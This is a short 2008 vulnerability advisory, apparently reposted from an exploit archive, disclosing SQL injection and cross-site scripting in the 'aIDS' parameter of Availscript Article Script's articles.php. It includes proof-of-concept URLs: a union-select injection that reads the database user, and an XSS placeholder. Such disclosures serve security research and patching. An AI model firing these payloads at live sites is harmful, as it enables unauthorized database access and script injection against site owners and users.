Availscript Article Script (articles.php) Multiple Vulnerabilities

🗓️ 09 Sep 2008 00:00:00Reported by sl4xUzType

zdt🔗 0day.today👁 21 Views

Availscript Article Script has SQL Injection and Cross Site Scripting vulnerabilities in articles.php, allowing unauthorized access and code injection by attackers

==================================================================
Availscript Article Script (articles.php) Multiple Vulnerabilities
==================================================================



###########################################################
# 
# Title: Availscript Article Script (articles.php) Multiple Vulnerabilities
# Vendor: http://www.availscript.com/
# Vulnerable Version: N/A
# Fix: N/A
# 
###########################################################
# 
# d0rk: "assh0le"
# stop lammo
# 
###########################################################

######################
  1. Information
######################
     Article Script allows you to publish your own articles or from the publishers or authors. Aministrator can go to admin page to edit, delete or manage articles, authors and categories. and the member can post articles as an author or just can read the articles.

######################
  2. Vulnerabilities
######################
     SQL Injection in "articles.php" in the "aIDS" parameter.
     Cross Site Scripting in "articles.php" in the "aIDS" parameter.

######################
  3. PoC
######################
     http://localhost/path/articles.php?aIDS=-1+union+select+1,2,user()--
     http://localhost/path/articles.php?aIDS=[XSS]

###########################################################



#  0day.today [2018-01-04]  #

09 Sep 2008 00:00Current

7.1High risk

Vulners AI Score7.1